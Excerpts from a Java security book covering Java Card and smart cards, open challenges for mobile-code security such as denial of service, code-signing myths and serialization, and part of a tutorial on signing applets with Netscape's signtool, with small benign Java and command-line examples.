As we mentioned earlier, one obstacle blocking widespread use of smart cards in U.S. markets has been the large number of incompatible and often obscure development languages available for writing smart card applications. Despite the ISO 7816 specifications, programming languages for smart cards have traditionally amounted to special-purpose assembly languages. Few developers were familiar with card application languages, the upshot being that only a handful of people could develop smart card code. As cards become computationally more powerful, new application languages are being designed and put into use. One of the most interesting new systems is Java Card 2.x (see www.javasoft.com/products/javacard/index.html).

The problem of multiple, noninteroperable platforms is not limited to smart cards, of course. A major part of Java's appeal is that it was designed as a cross-platform solution. Developers have always wanted a solution to the platform problem (other than the adoption of one single proprietary platform controlled by a monopoly). Java is one good way of addressing the platform problem on smart cards. A Java card is a smart card that is able to execute Java byte code, similar to the way Java-enabled browsers can. But standard Java with all of its libraries (especially in the Java 2 guise) is far too big to fit on a smart card. A solution to this problem is to create a stripped-down flavor of Java. Card Java is just such a flavor. It's based on a subset of the Java API plus some special-purpose card commands.

Besides providing developers with a more familiar development environment, Card Java also allows smart cards to have multiple applications on them. For the most part, existing smart card products (especially in the financial arena) have only one application per card. This application is automatically invoked when power is provided to the card or the card is otherwise reset. The one-application-per-card paradigm doesn't scale well, to say the least. Who wants to carry 20 credit cards around? Card Java can solve this problem by allowing multiple applications, potentially written by different organizations, to exist on the same card. The idea of multiple applications from potential competitors running on the same VM raises a number of security issues, which we address later in the chapter.
Java Card Security: How Smart Cards and Java Mix
Section 2 -- What Is a Smart Card?
A smart card looks just like a credit card, only with a chip embedded in its plastic. Imagine replacing the hologram on a standard credit card with a similarly thin chip and you get the idea. Most smart card chips are about the size of a dime (only thinner) and can be recognized by their distinctive gold terminals. Figure 8.1 shows a Visa smart card.
Figure 8.1 Visa has been active in the development of the Java Card. Visa's Open Platform classes interact with Java Card to provide a secure framework within which to develop smart card applications. (This figure used by permission from Visa.)
A smart card chip is actually a complete little computer with nonvolatile memory, storage, a card operating system (COS), and accompanying communication protocols. The most advanced smart cards on the market have the processing power once found in an IBM-XT (with less memory, of course). There are many different uses for smart cards. Smart cards can serve as:
● Security cards that are able to identify the carrier using advanced authentication algorithms and can safely store secrets like private keys
● Electronic wallet cards that use several different approaches to store value and provide a kind of electronic cash
● Transaction cards that take over the role once played by the magnetic stripe commonly found on the back of credit cards
● Processor cards that carry out proprietary calculations in a black-box fashion
● Memory cards that act as highly portable databases
● Cards with Virtual Machines that run Java applets
Unlike traditional computers, smart cards are not delivered with a built-in power supply, a keyboard, or a display device. That means smart cards require a terminal in order to work. Such a terminal is usually called a smart card reader or a card acceptance device (CAD). Some of these readers can be quite small and provide limited capabilities. For example, one CAD popular in Europe among users of stored-value telephone cards is not much bigger than a smart card itself. This CAD's sole purpose is to display the balance of money stored on the card. (Having a trusted device with which to query a card you own is important for consumer peace of mind, especially when spending money at businesses of questionable trustworthiness. Plus, it's nice to be able to verify that transactions, like adding money to a card, actually happen properly.)

CADs are also present at merchant sites (usually in the form of point-of-sale devices) and at issuing banks. These CADs may look much like a typical point-of-sale credit card processor, with a small display screen and a few buttons for answering queries or entering PINs. In similar fashion to today's ATMs, a smart card is inserted directly into the reader. The reader then provides power to the card and sets it up to receive software commands. Although a CAD of this sort may look like an ATM on the outside, a smart card is much more powerful than an ATM card or a mag-stripe credit card. These latter cards store only a few kilobytes of information on the magnetic stripe and are not capable of performing computations. Smart cards can store many megabytes of information and carry out sophisticated cryptographic calculations.

Another sort of CAD more commonly encountered by developers is one connected directly to the serial port of a standard PC. Using development environments similar to those used in normal application development, programmers can create code for smart cards, download it into a prototyping card, and in this way create new smart card applications. Most major smart card vendors have proprietary Java development environments: Gemplus offers the GemXpresso environment; Schlumberger offers Cyberflex.

There are many custom command sets for smart cards. In fact, there are so many custom environments, and they are so specialized, that the number of smart card programmers is very small. Considering that smart cards are traditionally programmed in platform-specific assembly languages and that each vendor has a different language, the small number of programmers should come as little surprise. The situation could be worse, of course. At least all of the major vendors conform to a set of common communications standards. The ISO 7816 specifications provide at least some common ground and ensure that smart cards have similar terminal pin-outs, accept standard protocol messages, and store some information in databases of common design [ISO7816, 1987]. ISO 7816 defines some commands in great detail and lays out communication protocols used by smart cards. Because of the existence of 7816, a smart card made by, say, Gemplus can interface with a CAD meant for, say, Schlumberger cards.

Smart cards have long been associated with security since they provide a partial solution to the need for personal identification and nonrepudiation. Because smart cards provide more nonvolatile storage than other highly portable devices, they make ideal storage compartments for digital identities. They can also compute hashes, session keys, digital signatures, and MACs right on the card. To the extent that a card is tamper resistant (something we will discuss further later in this chapter), it can be used to store important secrets such as DES keys or RSA private keys.
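As an aside for readers experimenting from the PC side today: host code that drives a CAD can also be written in Java. The sketch below uses the javax.smartcardio API, which appeared in Java SE 6 (long after this book was written), and the application identifier (AID) bytes are a made-up placeholder. It simply powers up the card in the first attached reader and sends an ISO 7816-4 SELECT command.

import java.util.List;
import javax.smartcardio.Card;
import javax.smartcardio.CardChannel;
import javax.smartcardio.CardTerminal;
import javax.smartcardio.CommandAPDU;
import javax.smartcardio.ResponseAPDU;
import javax.smartcardio.TerminalFactory;

public class SelectAppletDemo {
    public static void main(String[] args) throws Exception {
        // Find the first attached reader (CAD) and power up the card in it.
        List<CardTerminal> readers = TerminalFactory.getDefault().terminals().list();
        Card card = readers.get(0).connect("*");        // "*" = any protocol (T=0 or T=1)
        CardChannel channel = card.getBasicChannel();

        // ISO 7816-4 SELECT by AID: CLA=00, INS=A4, P1=04, P2=00, data = AID (placeholder).
        byte[] aid = {(byte) 0xA0, 0x00, 0x00, 0x00, 0x62, 0x03, 0x01, 0x0C, 0x01};
        ResponseAPDU resp = channel.transmit(new CommandAPDU(0x00, 0xA4, 0x04, 0x00, aid));
        System.out.printf("SELECT status word: %04X%n", resp.getSW());  // 0x9000 means success

        card.disconnect(false);
    }
}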
Java Card Security: How Smart Cards and Java Mix
Section 1 -- Java Security Goes Both Ways
There are a large and growing number of Java systems, running the gamut from Java gizmos such as Java rings, through smart cards with built-in Java interpreters (the subject of this chapter), to complete Java Development Kits and Integrated Development Environments (IDEs). Java is simultaneously making inroads on many fronts. In distributed systems, Java-based servers and servlets are becoming as common as Java clients.

As with any platform meant to interact in a networked world, there are security concerns with each flavor of Java. These concerns take on a new urgency when it comes to e-commerce. When electronic blips are money, the stakes change considerably. It may be an inconvenience to lose a Web server that amounts to fancy brochureware; it is something else entirely if the Web server and its associated backend perform all customer transactions. The security concerns raised by e-commerce are a large enough topic in their own right that there is no way we can do them justice here. Of course, because Java is commonly used at all levels in e-commerce systems, the risks we identify have serious e-commerce implications. This is especially true for Java cards.

Counterintuitively, Java is both growing and shrinking at the same time. On one hand, the JDK, now up to Java 2, is doubling in size with each major release. Just to complicate matters, while the code base is growing explosively, the security architecture is undergoing a major reorganization. Chapter 2, "The Base Java Security Model: The Original Applet Sandbox," and Chapter 3, "Beyond the Sandbox: Signed Code and Java 2," detail the new model. On the other hand, embedded Java systems like Card Java 2.x strip Java functionality down to the bare bones. The security model is not immune to this effect and has been deeply affected by Java's migration to smart cards.

These two diverse directions both have important security implications. Java 2 involves fundamental changes to the Java security model as the Java sandbox metamorphoses into a trust-based system built on code signing. Card Java 2.x removes much of the sandbox, leaving smart card applets more room to misbehave.
The Future of Java Security: Challenges Facing Mobile Code
Section 1 -- Lessons from the Trenches
Java has evolved more quickly than any other computer language in widespread use. As the language itself has evolved, so, too, has the security model. Here are some lessons we have learned as we have watched Java's approach to security change.

Type safety alone is not security. Chapter 1, "Mobile Code and Security: Why Java Security Is Important," and Chapter 2, "The Base Java Security Model: The Original Applet Sandbox," explain why type safety is critical to Java's security model. Chapter 5, "Attack Applets: Exploiting Holes in the Security Model," shows what happens when type safety is compromised. Java security is much more than type safety, however. Think of type safety as the foundation of a complete Java security solution. The foundation is essential, but much needs to be built on top of the foundation to make a useful building.

Real security is more difficult than it sounds. Securing a system as complex as Java (not to mention systems built on top of Java) is a nontrivial undertaking. Do not let slick marketing convince you that building a secure system is easy. It isn't. Java provides a powerful set of tools that can help you create a secure system, but simply using the tools is no guarantee of success. You must use the tools wisely and closely scrutinize your system from a security perspective. If ever there was a time to practice solid software engineering, design, and implementation of secure systems, it is now.

It is impossible to separate implementation errors from design problems. Recurrent security problems are a clue that something is wrong with the way in which a system is being developed. These problems are introduced at many different stages of system design and implementation. In today's fast-paced consumerware market, security assurance is often among the first things to go. Specifications, if they exist, are vague. Sometimes they are silent on critical points, leaving the implementor to play a guessing game. What may seem to be a simple security bug often indicates deeper problems in the development process.

New features introduce new security holes. Java has grown by leaps and bounds. With each major release of Java, a number of new serious security holes have been discovered. This is not surprising. It is exceptionally difficult to get everything exactly right in a complex system, and security demands nothing less. Java 2 introduces many powerful new features into Java. Security holes are likely to be discovered in the implementation and design of these features.

New classes of attacks keep appearing. Security attacks can be likened to rushing floodwater; sometimes the places they flow are surprising. It is not possible to anticipate all future security attacks, mostly because security attacks break systems in novel ways. Do not rely on historical data alone for security analysis and protection. There is much more to real security expertise than being able to recount stories of past compromises.

Humans are an essential element to consider. No system as complex as the Java platform can be used without lots of human intervention. Java 2 provides a perfect example of this fact. Without proper policy creation and management, trust-based security models are exceptionally dangerous. Proper use of advanced technologies requires forethought, planning, and careful management. A big part of this management is anticipating what real users of a system are likely to do, as well as what real attackers are likely to do.

These lessons are relevant to each and every security-critical, Java-based system. Creating a secure system is hard work, but it is quite possible to come up with a system that has reasonable security in the trenches and addresses a majority of risks.
The Future of Java Security: Challenges Facing Mobile Code
Section 2 -- Challenges for Secure Mobile Code
Java has risen to meet many important challenges of mobile code security. That means Java is by far the most security-aware of the many mobile code platforms. If you want to use mobile code and you are concerned with security, use Java. Of course, things are not perfect and there are still some open problems. Here are a number of remaining challenges that secure mobile code systems, including Java, must face.
Denial of Service

We spent some time discussing denial of service in Chapter 4, "Malicious Applets: Avoiding a Common Nuisance." As we said there, denial of service is a difficult problem for computer security that has yet to be addressed, not just in Java, but all over the network infrastructure. Successful denial-of-service attacks have been carried out against ISPs by exploiting weaknesses in TCP/IP, the protocol that is the lifeblood of the Internet. Java is not immune to the denial-of-service problem, either.

Denial of service can be more or less serious depending on where the problem manifests itself. On one hand, if a hostile applet crashes one user's browser by popping thousands of large windows, not much real harm is done. On the other hand, if a servlet crashes an enterprise Web server, real harm occurs. Our Chapter 4 discussion focused primarily on the client side; however, Java is making inroads in places where denial of service takes on more urgency as a problem. Server-side Java is one example. Another example can be found in systems with built-in Java VMs like Oracle8 or HP printers. The implications of denial of service for these systems are much greater than in the client case.

New forms of denial-of-service attacks will be made possible by complex client-server systems like RMI that make extensive use of networking, synchronization, and locks. Denial of service in such a system becomes as easy as holding a lock. Distributed system applications will need to apply timeouts and other mechanisms to mitigate the risks of an uncooperative process.

Dealing with denial of service is not an easy task. Limiting resource allocation is one solution. Perhaps future versions of Java will include policy elements that can specify resource limits on the basis of identity. That way, constraints can be managed according to where code is coming from and how much it is trusted. These sorts of hooks do not yet exist in the Java 2 model.
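As a rough sketch of the kind of timeout discipline a distributed Java application can apply today, consider the class below. This is our own illustration, not an API from RMI or the Java 2 policy mechanism; the class name GuardedResource is hypothetical. It relies only on the wait/notify timeout facilities that have been in Java since JDK 1.0, so that a single uncooperative caller cannot hold a shared resource forever.

// Hypothetical sketch: guard a shared resource with a timed wait so that a
// misbehaving client cannot tie up the server indefinitely.
public class GuardedResource {
    private boolean inUse = false;

    // Try to acquire the resource, giving up after timeoutMillis milliseconds.
    public synchronized boolean acquire(long timeoutMillis)
            throws InterruptedException {
        long deadline = System.currentTimeMillis() + timeoutMillis;
        while (inUse) {
            long remaining = deadline - System.currentTimeMillis();
            if (remaining <= 0) {
                return false;        // timed out; the caller can refuse service
            }
            wait(remaining);         // releases the monitor while waiting
        }
        inUse = true;
        return true;
    }

    public synchronized void release() {
        inUse = false;
        notifyAll();
    }
}

A server-side component might call acquire with a short timeout and simply drop or defer a request when the call returns false, rather than blocking behind a client that never lets go.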
Understanding Code Signing

There are a number of myths about code signing. Here are some of the most egregious:

Myth: Signatures denote authorship. The only thing a signature really tells you is who signed the code. From this piece of information, people infer a sense of vouching; that is, if a piece of code is signed, the implication is that the signer somehow vouches for the code. Unless you trust the person or organization who signed a piece of code, code signing gives you nothing. In the end, code-signing schemes simply amount to technological wrappings around a human trust decision.

Myth: If a signer is honest, the code is secure. Clearly, since all that a signature tells you is who signed the code, the signature says absolutely nothing about the code's security. Even the best-intentioned signer can only give you an honest opinion about the code, and that opinion might not be worth much if the signer isn't a technical expert. Certification schemes may begin to change the way this works if there are well-known, competent organizations that choose to vouch for certain code properties. These organizations can have signatures that count as validation stamps.

Myth: Signatures imply accountability/liability. The legal ramifications of digital signatures and what they denote have yet to be tested in the courts. Given the state of software liability in the industry, it is unlikely that a signature will carry much legal weight in terms of liability.

Assuming these myths are properly debunked, there are still some real barriers to trust models based on digital signatures. One of the main problems that will deeply impact the adoption of signing-based approaches is the lack of a public key infrastructure (PKI). Without some way of quickly and easily validating a signature, the market is unlikely to embrace code signing quickly. Adding to any lethargy in adoption caused by the poor state of the PKI is the equally poor state of tools for managing digital identities and policies (see Chapter 6, "Securing Java: Improvements, Solutions, and Snake Oil"). In particular, issues of certificate revocation and storage loom large.
Secure Distributed Programming
Distributed computing is still in its infancy. Complex systems like CORBA reflect this. Managing trust, identity, and policy in a distributed system is much more difficult than doing so on a VM-by-VM basis using, for example, Java 2. Standards are emerging slowly, and there is much confusion in the market regarding competing systems. Choices include Java's RMI, CORBA (encompassing both IIOP and IDL), and DCOM (or one of its many marketing identities). Common to all of these approaches is the problem of complex identity, which is not well understood. Figure 9.1 shows why the problem is difficult. In real distributed systems not only is code mobile, but other functionality is, too. Interprocess communication across different machines can get hairy fast. RMI may not be equipped to handle some of the challenges that trust models entail.
Figure 9.1 The problem of complex identity. In this example, Bob's applet, running on Alice's VM, is communicating (possibly using RMI) with Donna's applet, running on Charlie's VM. Creating usable policies for situations like these is not well understood.
Being a True Multiuser System

The Java VM is not currently a replacement for a multiuser operating system. Neither is JavaOS a real multiuser operating system. JavaOS in its current instantiations is meant only to run a single Java VM. Object sharing and process firewalling rely on this fact to work. There are many problems to solve before the VM can serve as a true multiuser environment, and researchers are just starting to address them.
Persistence, Linking, and Versioning

Systems in which objects can be serialized (think of it as freeze-drying a process) and reconstituted elsewhere (thawed out) are susceptible to the "environment problem," and it is likely that security holes will be discovered in these systems. The problem is that there is no guarantee that the environment in which an object is thawed will be remotely similar to the one in which it was frozen. This can be a problem if the object assumes (as almost all code does) that its environment doesn't suddenly undergo drastic changes. This kind of problem can easily lead to type-safety problems and security risks.

The problem can be related to Descartes' brain in a vat experiment. In that venerable thought experiment, seventeenth-century philosopher Rene Descartes (of "I think, therefore I am" fame) asked how it is that we know for certain that our perceived environment is really there-that we are not simply a brain in a vat that is being fed all the right data by a malicious demon. The unfortunate answer is that we can't ever be certain. If you substitute serialized code for the brain and the environment for the vat (and the controlling demon), you can get the idea. Deserialized software will never be in the position to probe its environment in order to discover where it really is or whether its environment is telling it the truth. This is problematic when it comes to security parameters and types. Actually, this analogy works well for mobile code in general.
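To make the freeze-dry/thaw metaphor concrete, the fragment below is a generic illustration of Java object serialization, written for this discussion rather than taken from any particular mobile code system; the class name FrozenState and the configDir field are hypothetical. Nothing in the thawing step lets the object verify what kind of environment it has been reconstituted into.

import java.io.*;

public class FrozenState implements Serializable {
    private String configDir = "/etc/myapp";   // an assumption about the environment

    public static void main(String[] args) throws Exception {
        // Freeze-dry: write the object to a byte stream.
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(bytes);
        out.writeObject(new FrozenState());
        out.close();

        // Thaw: reconstitute the object, possibly in a very different environment.
        ObjectInputStream in = new ObjectInputStream(
                new ByteArrayInputStream(bytes.toByteArray()));
        FrozenState state = (FrozenState) in.readObject();

        // The thawed object simply assumes configDir still means what it meant
        // before; it has no way to probe whether its new "vat" is telling the truth.
        System.out.println("thawed with configDir = " + state.configDir);
    }
}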
Design for Security

Java offers a number of tools with which secure systems can be built. Obviously, this does not imply that all systems written in Java that make use of its security features will be secure. Designing a secure system takes much foresight and demands rigorous assurance at all levels of the process. Risk-based security testing can help.

The best security-assurance approach begins with a system specification. Given a detailed-enough specification, a thorough risk analysis can identify potential vulnerabilities and point out areas of the system with the greatest risk. Security risk analysis includes characterizing threats and attacks and working out attack scenarios based on potential attacks. For example, a specification may prove vulnerable to playback attacks (a common problem among systems originally designed for use on proprietary networks), decompilation (in which mobile code secrets can be divulged), or cryptanalysis attacks (in which things like weak data integrity hashes can lead to complete system compromise).

Given a thorough risk analysis of a system specification, the next step is to create a plan for probing system security through testing. Note that the kind of testing we are talking about here is not functional testing; it is risk-based testing related directly to the risk analysis. Functional testing tells you only if your system meets design specifications and produces the right output. Risk-based security testing tells you whether your system can be compromised by security attack. Security testing is at its heart a creative endeavor that is only as powerful as the risk analysis on which it is based. As such, security testing is no guarantee of security, but it certainly beats not testing for security at all. By following a proper test plan, actual testing can be carried out on a live system.

External analysis for security is a good idea. Note that the definition of external can vary. At the very least, a security review should be performed by a different team (within the same organization) from the design team. Designers tend to be too close to the system and tend to overlook security problems, even if they understand security well. In any case, it is essential that external reviewers have a strong body of security expertise and knowledge on which to draw. Analysis by external security experts may be warranted as well, although only for truly security-critical systems.

Systems that are designed expressly with security in mind usually turn out better than those that are not. One of the worst approaches to take is to try to bolt security on the side of an existing system. This is especially true of systems that have been fielded successfully on proprietary networks (or no network at all) and that are migrating to the Internet.
The Future of Java Security: Challenges Facing Mobile Code
Section 3 -- Software Assurance for Java
Many organizations creating security-critical code, especially those in the electronic commerce arena, have reputations to protect. Banks, for example, are reluctant to talk about security problems for good reason-bank customers expect their bank to have excellent security. No one wants to play Russian Roulette with his or her money (unless, of course, he or she is in Las Vegas). The same can be said of any organization that has essential information assets to protect. Strong security assurance practices can help.

The main objective behind software assurance is making sure that software does what it is supposed to do. Software assurance encompasses more than just security. The same core idea-making software behave-is deeply entwined with software reliability and software safety as well.
Sound Software Engineering

The most effective way to make sure your code behaves itself and does not introduce unnecessary risk is to practice sound software engineering. Following a reasonable development process is a good start. Begin with a problem-analysis phase that delivers both a set of requirements and a high-level specification. Develop a software assurance plan simultaneously, so that problems are identified and removed as early in the development life cycle as possible. The earlier you remove problems, the more money you save.

Unfortunately, many software organizations creating software for the consumer market have poor software development practices. Partly because of supercompressed development schedules, specifications are rarely created. Without a specification, it is not possible to undertake a proper security analysis. Lack of a specification makes testing harder, too.

There are two main constraints on testing in the real world: 1) exhaustive testing is known to be impossible (one of the fun results of theoretical computer science), and 2) testing resources are always limited. This implies a direct need for ways to optimize testing and get the most bang for your testing buck. In terms of security assurance, a risk-based approach to testing is very cost effective. (See page 250.)

Automated tools and methodologies can help make software assurance more effective as well. The days in which software analysis and testing was a black art are ending. A number of technologies-for example, code coverage analysis-are entering the mainstream. Test tools can be just as effective for security analysis as they are for more standard functional testing, especially when they are wielded by security experts. Advanced assurance methodologies like software fault injection are also maturing into powerful tools [Voas and McGraw, 1998].

The best approach to security is to design security into a system instead of adding it later. The earlier in a development process that this can happen, the better. Risk analysis can be applied at all levels of the software process, from requirements to finished process. Together, risk analysis and testing for security result in a strong methodological approach.
The Future of Java Security: Challenges Facing Mobile Code
Section 4 -- Should You Use Java?
By now you should know the authors' answer to this important question: Java has much to offer, but its use should be managed wisely. Although one might like a simpler answer, there is no way to properly make Java-usage decisions on anything other than a case-by-case basis. The way to make your own decision about Java is to start by assessing your risks. What could you lose? The next step is to weigh the risks against the benefits. Is what you gain worth the potential loss?

Java has lots to offer. It's the most viable attempt so far to provide secure mobile code. Java is deeply tied to the Web and comes with many advanced networking features. Java is powerful and can be used to write full-fledged programs. Java is a more portable application language than any other on the market today. Java includes advanced language features that all developers should have access to. To top it off, Java is truly concerned with security.

On the other hand, by using Java, you are taking risks. Security can never be completely guaranteed. Anyone who tells you it can is wrong. By connecting your computer to the Net at all, you have decided to take some degree of risk. If you're willing to do that, then you should probably be willing to use Java. Then again, there are things about Java that set it apart from other languages and Internet services. For one thing, Java makes running someone else's untrusted code a normal event!

The previous chapters have explained the current Java security model. Included in that discussion is an analysis of the vulnerabilities found thus far. Hostile applets-both in the serious attack applet guise and in the malicious applet guise-are a possibility that needs to be taken seriously. Security research on Java will continue to expose problems in the future. The security community, working closely with Sun Microsystems and the Java licensees, will make sure each new vulnerability is quickly and properly patched. In addition to discussing particular bugs in the current Java implementations, we have also examined some more general concerns. Hopefully, most of these will be addressed in the enhancements planned for the near future. Finally, we have introduced some guidelines by which Java can be developed and used in a more secure manner. If you are a Java developer (or a development leader), you can use our developer guidelines to defend your code against security attacks. If you are a Java user (or part of an enterprise built around Java), you can use our user guidelines to mitigate common risks.

We hope this book continues to prove a useful reference on Java security. Armed with this information, you can make informed decisions regarding Java use for yourself and your business.
Frequently Asked Questions
See the up-to-date FAQs on the Web:
● Java Security FAQ
● Java versus Active X
Java Security Hotlist
See the Java Security Hotlist, a feature of the Java Security Website: http://www.rstcorp.com/javasecurity/links.html
How to Sign Java Code
This tutorial was put together by John Viega and Tom O'Connor, both research associates at Reliable Software Technologies. The four major sections each describe a separate vendor's code-signing tools, including:
● Netscape's Object Signing
● Microsoft's Authenticode
● Sun's JDK 1.1 Code Signing
● Sun's Java 2 Code Signing
Some of the tools are tricky to figure out and use. This tutorial should help. Before you dig into this tutorial, you should read Chapter 3, "Beyond the Sandbox: Signed Code and Java 2," which discusses the major impact that signed code has on the Java security architecture. Of special interest are the sections entitled Signed Code (see page 88) and Trust (see page 92). The material there discusses the notions of trust, digital signatures, and certificate authorities.
Appendix C Sections
1. Signing Classes with the Netscape Object Signing Tool
2. Signing Java Applets with Microsoft's Authenticode
3. Comparing Authenticode to Netscape Object Signing
4. Signing Code with Sun's JDK 1.1.x
5. Differences Between Netscape Object Signing and JDK 1.1.x javakey
6. Signing Code with Sun's Java 2
7. Differences between JDK 1.1 Code Signing and Java 2 Code Signing
8. In Conclusion
How to Sign Java Code
Section 1 -- Signing Classes with the Netscape Object Signing Tool
First in our tutorial, we'll take on Netscape's Object Signing Tool, which can be used to sign Java code (among other things). As in all of these systems, step one is obtaining an identity.
Getting a Certificate

Most digital signature schemes (PGP being a notable exception) involve the use of a Certificate Authority (CA)-an organization that can vouch for someone's signature. After all, why trust code just because it carries a signature? We need an objective third party to make sure people are who they say they are. That means the first task in code signing is to obtain the proper credentials from a CA.

There are many CAs that can sell you certificates for signing Java code. Netscape has links to CAs that support their Netscape Object Signing Tool at https://certs.netscape.com. You can visit that page and pick a CA. Make sure that the CA you choose provides a certificate that can be used to sign objects (some certificates can't).

VeriSign offers many flavors of Digital IDs. It heads up Netscape's list of CAs. We'll use VeriSign as an example for obtaining a certificate; however, note that the process will differ depending on the CA that you choose. To get a VeriSign certificate for Netscape Object Signing, select Software Developer ID from the popup list at the top of VeriSign's homepage. Choose Netscape Object Signing from the page that follows. There are two kinds of Software Developer IDs: a Class 2 Individual ID, and a Class 3 Commercial ID. The Class 2 ID costs $20 annually, while the Class 3 ID is a whopping $400 annually. For our purposes, we'll focus on Class 2 certificates. After selecting Class 2, fill out the information form that asks who will be identified by the certificate (making sure to include the all-important billing information).
VeriSign will do a limited background check on you before it will issue a certificate. For example, it checks the data you enter against information publicly available on you through a credit check. If your request for a certificate is accepted, VeriSign will email you a PIN and a URL that you can use to retrieve the certificate. For an individual Class 2 certificate, the verification process is usually close to instantaneous. Once you receive that information, open the URL with Netscape Communicator and then enter your PIN. Communicator will install the certificate in itself automatically.

If you are using a shared version of Communicator, someone may have already entered a password for the certificate database that is stored in your browser. You will need this password before you can download and install your certificate; otherwise, you will be prompted to enter a password for the certificate database. Although this password is optional, it does prevent people from starting up your version of Netscape and stealing your certificate by exporting it. You definitely don't want your certificate stolen, because then other people can sign applets as you. Password information can be found in the Security Info box of the Communicator menu, under Passwords. If everything is successful, your certificate will appear in the Security Info box; check by going to Yours under Certificates.

There are several things to know as you sign up for a certificate:
1. You do not want a Class 1 certificate, as it cannot be used to sign objects.
2. Use Netscape Communicator (4.x), even though you are allowed to request and download a certificate using Netscape Navigator 3.x, because the support for certificates in 3.x is not as good as it is in later browsers. For example, object signing tools may not be able to locate your certificate inside Netscape 3.x. Also, you may not be able to export your certificate, which is useful if you want to sign code from a machine other than the one from which you originally downloaded the certificate.
3. Use the same browser on the same computer both to request and to retrieve the certificate. If the browser is set up with multiple user profiles, make sure you use the same user profile as well; otherwise, you will likely be unable to retrieve your certificate.
4. Finally, note that many versions of Netscape Communicator will be unable to verify your certificate (assuming you got a VeriSign certificate). Unfortunately, information concerning this problem seems to have disappeared from the Netscape Web site.
Exporting and Importing Certificates

It is a good idea to export your certificate to a file, just in case you install a new version of Communicator over your old one. Doing so also allows your certificate to follow you to other machines.

To export a certificate, bring up Communicator's Security Info dialog box. Select the certificate you wish to export by clicking on its name. Then, click on the Export button. At this point, you may be asked to enter the password that protects your local browser's certificate database. Next, you will be asked to enter a password to protect the certificate data. This password is used to make sure that no one can steal your certificate if he or she sees an exported copy of it somewhere (unless that person is able to crack your password, so choose wisely!). To make sure you typed the password in correctly, you will be asked to enter it again. Assuming you've entered the same password both times, Netscape will prompt you for a filename, which it will use to store the certificate. Once you enter the filename, you're finished exporting the certificate. You can copy that file to another machine so you can sign code from there as well.

To import a certificate into a new browser, bring up Communicator's Security Info box. Click on Yours, which is a subitem of Certificates. Press the button, Import a Certificate. If you have not previously entered the password protecting the certificate database of the local copy of Netscape, you will now be prompted to enter it. After you enter the correct password, a file dialog box will come up; use it to select the file containing your certificate. Once you have selected the file, you will be prompted for the password used to protect the certificate, which is the password that you entered when you exported the certificate. At this point, assuming all has gone well, you should get a dialog box indicating success.
Netscape Object Signing Tool 1.1

The Netscape Object Signing Tool is a command line program that creates digital signatures for files. These signatures aren't stored in the files themselves; they're stored in the JAR file in which you bundle your applet. Note that since digital signature information is transmitted in JAR files, you must package your applets in a JAR file in order to sign them, even if they consist only of a single class. The important syntax for using a JAR file with the HTML APPLET tag is:

<APPLET CODE="somefile.class" ARCHIVE="jarfile.jar">

where somefile.class is the class in the JAR file where execution should begin, and jarfile.jar is the URL of the JAR file.

The Netscape Object Signing Tool may be downloaded from developer.netscape.com/software/signedobj/jarpack.html. The tool is available for most operating systems. While, as of this writing, version 1.0 is still available for download, we recommend that you use version 1.1. After the download is complete, unpack the archive file in a directory. Included are three files: readme.txt, license.txt, and signtool. To make signing objects easier, put the directory that contains signtool in your PATH environment variable, as per your operating system. For example, a Windows 95 user who unpacked the tool to C:\nos would run the following line (and then add it to the autoexec.bat file):

PATH=%PATH%;C:\nos

Before attempting to sign anything, check to see if signtool is able to locate the certificate that will be used to sign objects. Unix flavors of signtool look for certificates in the $HOME/.netscape directory. If your local Netscape files are kept somewhere else, or if you are using the Win32 version, signtool must be explicitly told the path to the certificates. This is done with the -d flag. On Win32, this path is commonly c:\Program Files\Netscape\Users\name, where name is the name of your Netscape Profile. To verify that your signing certificate was installed properly, run

signtool -l

or, if your certificate cannot be found,

signtool -d"<path to certificates>" -l

For example, if your certificates were stored in C:\nos, you would type:

signtool -d"C:\nos" -l

If your certificate still does not appear in the listing, verify that the certificate is installed in Netscape properly. (See the instructions given earlier.) Also check that the path to the Netscape .db files was properly specified. If all else fails, check with Netscape and the issuing Certificate Authority. Make note of the full name of your certificate as it appears in the listing; you will need these data when it comes time to sign.

Create a directory in which to put all the class files for the applet you wish to sign. Once all the class files that make up the applet are in the right place, the signtool program can create a signed JAR file in one step. Navigate into the directory containing the soon-to-be signed classes. To sign the classes and create a JAR file in one step, issue the command:

signtool -d"<path to certificates>" -k"<certificate name>" -e ".class" -Z myjar.jar .

If your Communicator Certificate Database is password protected, signtool will prompt for the password before signing the classes. The "." at the end of the command should be the last thing to appear. It specifies that the signing should begin in the current working directory. The signtool command recursively signs files by default. To keep the tool from recursing through directories, add --norecurse to the command line.

Here's a brief explanation of the flags used in the previous example, as well as some of the other more useful flags for signing applets:

-k "certificate name": Specifies the certificate with which you would like to sign. This flag is necessary when signing an applet. The certificate name should be the entire name of the certificate as it appeared in the output of signtool -l. Since the certificate name is likely to have spaces in it, make sure you place it in quotes; otherwise, the signing will fail.
-e".extension": Specifies the file extensions to sign. If you don't include this flag, the tool will sign all files, as opposed to the preceding example, which uses this flag to sign .class files only.

-x"name": Allows you to sign all files except a particular file or directory. An example where this might be useful is when you are using an untrusted library in your applet. You probably will not want to vouch for code you did not write!

-Z"jarfile": Specifies the name of the JAR file to create. If you omit this option, you will have to JAR everything up yourself.

When the JAR file is created, signtool can be used to test the validity of the signatures. This is done by issuing the command:

signtool -d"<path to certificate>" -v myjar.jar

signtool will list the contents of the JAR and verify that they have been signed, and that they have not been tampered with since the signature was created. You may also check to see who signed the JAR file:

signtool -d"<path to certificate>" -w myjar.jar

signtool can be used to sign anything, not just Java files. In fact, it can extract JavaScript from HTML files, and sign just the JavaScript; however, that functionality is outside the scope of this tutorial. Documentation on signtool is available from Netscape at developer.netscape.com/docs/manuals/signedobj/signtool/.
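As a concrete illustration of the -x flag (our own hypothetical example, not from the official documentation; the lib directory name and JAR name are placeholders), the following command signs all the .class files in the current directory tree except those under lib:

signtool -d"<path to certificates>" -k"<certificate name>" -e".class" -x"lib" -Z myjar.jar .

This lets you vouch for your own classes while leaving a bundled third-party library unsigned.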
Adding Capabilities to Your Classes

As Chapter 3 describes, signing a Java applet does much more than just allow people to verify that you signed it. It can also give your applets the chance to step outside the Java sandbox. If your applet has a digital signature vouching for it, then the applet may request special privileges, such as accessing the file system. However, the user of the applet doesn't have to let your applet do what you request just because you sign it.

